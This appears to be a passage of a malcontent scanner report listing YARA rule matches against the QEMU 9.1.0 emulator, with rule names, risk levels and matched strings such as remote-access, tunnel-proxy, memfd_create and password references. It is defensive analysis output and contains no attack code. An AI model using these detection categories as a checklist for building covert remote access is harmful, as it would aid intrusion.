[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-pci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ahci-sysbus](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fahci-sysbus&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-bus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-bus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ide/ide-dev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fide%2Fide-dev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/intc/intc.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fintc%2Fintc.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/ipack/ipack.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fipack%2Fipack.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/misc/vmcoreinfo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fmisc%2Fvmcoreinfo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nmi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnmi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/nvram/fw_cfg.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fnvram%2Ffw_cfg.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci-host/gpex.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci-host%2Fgpex.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_bridge.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_bridge.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_device.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_device.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pci_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpci_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/pci/pcie_port.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fpci%2Fpcie_port.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/qdev-core.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fqdev-core.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/resettable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fresettable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/esp.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fesp.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/scsi/scsi.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fscsi%2Fscsi.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sd/sdhci.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsd%2Fsdhci.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/sysbus.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fsysbus.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/imx-usb-phy](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fimx-usb-phy&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/usb/msd.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fusb%2Fmsd.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-commo](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-commo&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vfio/vfio-conta](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvfio%2Fvfio-conta&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vdpa-dev](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvdpa-dev&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-sc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-sc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-us](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-us&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/vhost-vs](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvhost-vs&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-b](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-b&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-c](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-c&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-g](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-g&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-i](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-i&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-n](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-n&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-p](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-p&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-r](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-r&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio-s](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio-s&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/virtio/virtio.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvirtio%2Fvirtio.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/hw/vmstate-if.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fhw%2Fvmstate-if.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-buffer.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-buffer.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-command](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-command&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-file.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-file.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-null.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-null.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-socket.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-socket.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-tls.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-tls.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel-websock](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel-websock&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/channel.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fchannel.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/dns-resolver.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fdns-resolver.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/io/net-listener.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fio%2Fnet-listener.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/can_host.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Fcan_host.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/net/filter.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fnet%2Ffilter.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qapi/qmp/qobject.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqapi%2Fqmp%2Fqobject.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bitops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbitops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/bswap.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fbswap.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/coroutine.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fcoroutine.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/int128.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fint128.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/iov.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fiov.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/lockable.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Flockable.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/main-loop.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fmain-loop.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/range.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frange.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/ratelimit.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fratelimit.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/rcu.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Frcu.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qemu/thread-contex](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqemu%2Fthread-contex&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/qom/object_interfa](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fqom%2Fobject_interfa&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/scsi/pr-manager.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fscsi%2Fpr-manager.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/accel-ops.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Faccel-ops.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/cryptodev.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fcryptodev.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/event-loop-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fevent-loop-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/host_iommu_](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhost_iommu_&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/hostmem.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fhostmem.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/iothread.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fiothread.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng-random.](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng-random.&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/rng.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Frng.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/tpm_backend](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Ftpm_backend&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/sysemu/vhost-user-](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fsysemu%2Fvhost-user-&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/console.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fconsole.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/dbus-display.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fdbus-display.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/include/ui/qemu-spice.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Finclude%2Fui%2Fqemu-spice.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/migration/channel-block.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Fmigration%2Fchannel-block.h&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/tcg/i386/tcg-target.c.inc](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftcg%2Fi386%2Ftcg-target.c.inc&type=code)
[/tmp/qemu-20240904-24095-51glkd/qemu-9.1.0/trace/control-internal.h](https://github.com/search?q=%2Ftmp%2Fqemu-20240904-24095-51glkd%2Fqemu-9.1.0%2Ftrace%2Fcontrol-internal.h&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [fs/proc/arbitrary_pid](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/arbitrary-pid.yara#proc_arbitrary) | access /proc for arbitrary pids | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/pid_cmdline](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/pid-cmdline.yara#proc_cmdline) | access command-line of other processes | [/proc/%d/cmdline](https://github.com/search?q=%2Fproc%2F%25d%2Fcmdline&type=code) | -| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) | -| MEDIUM | [hw/dev/block_ice](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/block-device.yara#block_devices) | works with block devices | [/dev/block/%u](https://github.com/search?q=%2Fdev%2Fblock%2F%25u&type=code)
[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | -| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | -| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | -| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | -| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | -| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | -| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | -| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | -| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | -| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | -| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | -| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | -| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | -| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | -| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | -| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | -| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | -| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
